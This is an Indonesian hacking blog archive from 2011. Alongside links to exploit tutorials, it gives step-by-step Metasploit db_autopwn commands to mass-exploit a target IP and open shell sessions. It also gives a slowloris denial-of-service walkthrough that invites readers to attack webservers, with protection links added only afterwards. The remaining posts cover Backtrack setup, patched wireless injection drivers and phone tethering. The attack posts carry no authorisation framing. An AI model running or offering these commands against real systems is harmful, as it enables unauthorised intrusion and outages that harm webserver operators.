Saturday, October 29, 2011

Kumpulan Tutorial Exploit


Disela-sela waktu senggang saya sering mengunjungi website exploit-db.com salah satu website arsip untuk ribuan exploits, disana juga ada beberapa papers atau articles yang dapat membantu sahabat untuk lebih memahami tentang Exploitasi. Saya kumpulkan kemudian terutama artikel yang ditulis dalam bahasa Indonesia.

[Indonesian] How to Write Shellcode
[Indonesian] Linux Buffer Overflow Tutorial
[Indonesian] Linux Buffer Overflow Tutorial II
[Indonesian] Linux Buffer Overflow Tutorial III
[Indonesian] Simple Technique for SQLi Form Login Bypass
[Indonesian] Implementasi Pishing Dengan Teknik DNS Spoofing 
[Indonesian] Praktek Stack Buffer Overflow
[Indonesian] Intro To Hack Basic #1
[Indonesian] Devilzc0de E-Magazine #3
[ezine] Code Reborn (Indonesian) 

Artikel ini akan terus diUpdate.

Friday, October 28, 2011

Exploit dengan db_autopwn

Sebelumnya saya pernah menulis tutorial Install Postgresql di Backtrack 5 untuk dapat melakukan serangan menggunakan db_autopwn di Backtrack. Serangan dengan db_autopwn membuat kita menjadi lebih mudah untuk melakukan serangan. Disini saya menggunakan database "msfbook".

1. Jalankan Metasploit.
root@bt:~# msfconsole
2. Lakukan serangan.
msf > db_connect root:toor@127.0.0.1/msfbook
msf > db_nmap IP_TARGET
msf > db_autopwn -p -t -e
msf > sessions -l
msf > sessions -i 1
sangat mudah untuk melakukan serangan, berikut sebuah video yang menunjukan betapa mudahnya melakukannya.






Serangan Dos kepada Webserver

Serangan pada webserver banyak sekali dirasakan oleh pihak pengelola webserver, dan harus bekerja ekstra untuk memperbaiki semua sistem yang telah terkena serangan dos. Pernahkah sahabat melakukan serangan DOS kepada webserver? kalau belum mari kita latihan untuk melakukan serangan dos. Disini saya menggunakan 2 buah file yang pertama lbd.sh yang berguna untuk melihat apakah webserver tersebut menggunakan load-balancing atau tidak, yang kedua adalah slowloris.pl yang digunakan untuk melakukan serangan dos.

1. Download file lbd.sh dan slowloris.pl disini, kemudian unrar.

2. Cek Load-Balancing dari webserver target.
root@bt:~# cd dos
root@bt:~# ./lbd.sh IP_TARGET
Contoh :
root@bt:~/dos# ./lbd.sh 10.3.0.67

lbd - load balancing detector 0.2 - Checks if a given domain uses load-balancing.
                                    Written by Stefan Behte (http://ge.mine.nu)
                                    Proof-of-concept! Might give false positives.

Checking for DNS-Loadbalancing: NOT FOUND
Checking for HTTP-Loadbalancing [Server]: 
 Apache/2.2.0 (Win32) DAV/2 mod_ssl/2.2.0 OpenSSL/0.9.8a mod_autoindex_color PHP/4.4.1-pl1
 NOT FOUND

Checking for HTTP-Loadbalancing [Date]: 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:29, 15:16:29, 15:16:29, 15:16:29, NOT FOUND

Checking for HTTP-Loadbalancing [Diff]: NOT FOUND

10.3.0.67 does NOT use Load-balancing.

root@bt:~/dos# 
Jika jawabannya adalah "10.3.0.67 does NOT use Load-balancing." maka kita akan melakukan serangan dos.

3. Serangan Dos.
root@bt:~/dos# ./slowloris.pl -dns IP_TARGET
* Untuk tipe serangan yang lain bisa dilihat didalam file slowloris.pl.

Berikut Videonya.








Update !

Mungkin dengan adanya artikel ini akan membuat beberapa webserver dirugikan, berikut beberapa tutorial yang saya kira dapat memberikan sedikit proteksi pada webservernya.

1. http://www.pc-freak.net/blog/protecting-debian-lenny-against-slowloris-denial-of-service-attack-with-mod_antiloris/
2. http://lwn.net/Articles/338407/

Thursday, October 27, 2011

Install postgresql di backtrack 5

Beberapa dari sahabat mungkin pernah mendengar tentang db_autopwn yang biasanya menggunakan postgresql sebagai databasenya untuk melakukan serangan exploit, kelebihan menggunakan db_autopwn adalah kita dapat menggurangi penggunaan waktu untuk melakukan serangan.

root@bt:~# apt-get install libpgsql-ruby postgresql libpq-dev
root@bt:~# su postgres
sh-4.1$ createuser root -P
could not change directory to "/root"
Enter password for new role: 
Enter it again: 
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n
sh-4.1$ createdb --owner=root metasploit
could not change directory to "/root"
exit
sh-4.1$ exit
exit

Dari tutorial diatas kita bisa melihat saya membuat database dengan nama metasploit.

Saya telah menulis tutorial Exploit dengan db_autopwn diblog ini dilengkapi dengan video tutorialnya.

Install Synaptic Package Manager diBacktrack

Buat sahabat yang baru dan biasa menggunakan ubuntu, mungkin akan kesulitan untuk mengatur aplikasi didalam backtrack, oleh karena itu dibutuhkan aplikasi untuk mengatur hal tersebut seperti diubuntu, contohnya Synaptic Package Manager atau Ubuntu Software Center. Maka kita sekarang akan melakukan installasi pada kedua aplikasi tersebut pada Backtrack kita.

1. Install Synaptic Package Manager.
root@bt:~# apt-get install synaptic

Tampilan Synaptic Package Manager pada Backtrack 5 R1.


2. Buka System > Administration > Software Sources, pada tab Ubuntu Software centang semuanya opsi dari Downloadable from the Internet.


3. Install Ubuntu Software Center.
root@bt:~# apt-get install software-center

Tampilan Ubuntu Software Center pada Backtrack 5 R1.


Untuk tutorial install Ubuntu Tweak DiBacktrack bisa dicari pada kotak pencarian.

Monday, October 24, 2011

Ebook Metasploit: The Penetration Tester’s Guide


Metasploit
The Penetration Tester’s Guide

“The best guide to the Metasploit Framework.” —HD Moore, Founder of the Metasploit Project

Metasploit adalah aplikasi yang powerfull digunakan untuk melakukan aksi exploitasi. Digunakan pada semua kalangan mulai dari pemula sampai tingkat yang Profesional. Ebook Metasploit ini sangat berguna bagi sahabat-sahabat yang ingin serius mengeluti dunia exploitasi

Thursday, October 13, 2011

Patch Driver Wireless diBacktrack 5 R1

Beberapa hari yang lalu ane lagi online, berhubung sinyal wireless lagi buruk(udah musin hujan), ane berencana mau keluarin itu wireless adapter yang tipe TL-WN321G, taruh diluar kamar,biar sinyal lebih oke,eh pas ane colokin kelaptop ternyata drivernya belum ada(Untuk versi Backtrack 4 kebawah driver rt73usb sudah disertakan didalamnya), akhirnya ane keliling dunia bersama om google untuk mencari pencerahan, dan akhirnya ketemulah didalam website resmi backtrack tentang patch pada driver wireless.

Sebelumnya ane kasih tau dulu drivers apa aja yang akan support jika dipatch

1. Wireless card yang support Injection
+ AWUS036H (rtl8187, r8187) - both mac80211 and IEEE drivers - passed
+ AWUS036NH (Ralink RT2870/3070) - using the mac80211 rt2x00usb drivers - passed
+ BCM4312 802.11b/g LP-PHY (rev 01) - using the mac80211 b43, works well - passed
+ Rockland N3 - (Ralink RT2870/3070) - using the mac80211 rt2x00usb drivers -passed
+ Edimax EW-7318USG USB - (Ralink RT2501/RT2573) - using the mac80211 rt2500usb/rt73usb drivers-passed
+ ASUSTek Computer, Inc. RT2573 - using the mac80211 rt2500usb/rt73usb drivers -passed
+ Linksys WUSB54GC ver 3 - using the mac80211 rt2800usb drivers -passed
+ Ubiquiti SRC - using the mac80211 ath9k drivers-passed
+ Internal Intel Corporation PRO/Wireless 3945ABG - using the mac80211 iwl3945 drivers-passed
+ Dlink WNA-2330 PCMCIA - using the mac80211 ath5k drivers-passed
+ Atheros Communications Inc. AR9285 Wireless Network Adapter (PCI-Express) (rev 01) - using the mac80211 ath9k drivers-passed
+ Netgear wg111v2 - using the mac80211 rtl8187 drivers-passed
+ ZyXEL AG-225H v2 - using the mac80211 zd1211 drivers - passed
+ Intel 4956/5xxx - using the iwlagn drivers - passed

2. Wireless Card yang dapat berjalan tanpa Injection
+ Broadcom Corporation BCM4321 802.11a/b/g/n (rev 03)
+ Broadcom Corporation BCM4322 802.11a/b/g/n Wireless LAN Controller (rev 01) 

3. Wireless Card Tidak dapat berfungsi
+ D-Link DWL-122 - using the mac80211 prism2_usb drivers - fail
+ Linksys WUSB600N v2 - using the mac80211 rt2800usb drivers - fail
+ AWUS051NH - fail 

Cara Mempatch bisa dilihat dibawah :

root@bt:~# ln -s /usr/src/linux /lib/modules/2.6.39.4/build
root@bt:~# cd/usr/src/
root@bt:~# wget http://linuxwireless.org/download/compat-wireless-2.6/compat-wireless-2011-07-14.tar.bz2
root@bt:~# tar jxpf compat-wireless-2011-07-14.tar.bz2 
root@bt:~# wget http://www.backtrack-linux.org/2.6.39.patches.tar
root@bt:~# tar xpf 2.6.39.patches.tar
root@bt:~# cd compat-wireless-2011-07-14 
root@bt:~# patch -p1 < ../patches/mac80211-2.6.29-fix-tx-ctl-no-ack-retry-count.patch 
root@bt:~# patch -p1 < ../patches/mac80211.compat08082009.wl_frag+ack_v1.patch 
root@bt:~# patch -p1 < ../patches/zd1211rw-2.6.28.patch 
root@bt:~# patch -p1 < ../patches/ipw2200-inject.2.6.36.patch 
root@bt:~# make 
root@bt:~# make install
root@bt:~# reboot

Akhirnya ane bisa juga gunain itu wireless adapter, cukup gunakan perintah modprobe [nama_driver] contohnya untuk driver TL-WN321G yang menggunakan driver rt73usb :

modprobe [nama-driver]
modprobe rt73usb

Semoga bermanfaat.
Thank's to Backtrack Wiki.

Tuesday, October 4, 2011

Internetan menggunakan Samsung Galaxy Mini diBacktrack

Kemaren kebetulan wireless diasrama ane lagi error tuh, jadi terpaksa deh ane harus cari cara untuk bisa selancaran sebebas bebasnya didunia maya, pas nga sengaja liat hp(Samsung Galaxy Mini), ane jadi teringat kemaren diwendus sijelek(pacar ane gann,"_") dia bisa internetan pake hp + kabel micro usb, jadi ane yang menggunakan linux ngak mau kalah, ane coba untuk menyambungkan leptop dengan hp, kemudian ane coba-coba dan ternyata berhasil gan,hoho.. ni dibawah caranya :

1. Sambungkan Handphone Galaxy Mini dengan leptop(OS Backtrack)

2. Masuk kedalam pengaturan USB tethering Menu > Settings > Wireless and networks > Tethering and portable hotspot , Kemudian centang USB tethering



3. Buka Wicd Network Manager Applications > Internet > Wicd Network Manager


4. Masuk kedalam pengaturan dan lakukan perubahan pada Network interfaces , pada Wired interface rubah menjadi usb0 kalau gagal pake usb1, klik OK.


5. Kemudian klik tombol Refresh

6. Cek pada kartu jaringan apakah usb0 sudah terdeteksi,jika sudah masuk Wicd Network Manager dan tekan tombol Connect pada Wired Network.


Selamat Berselancar, jangan lupa share y artikelnya,hoho..
thank's to my family
thank's to jelekh
and thank's for u.

 
biz.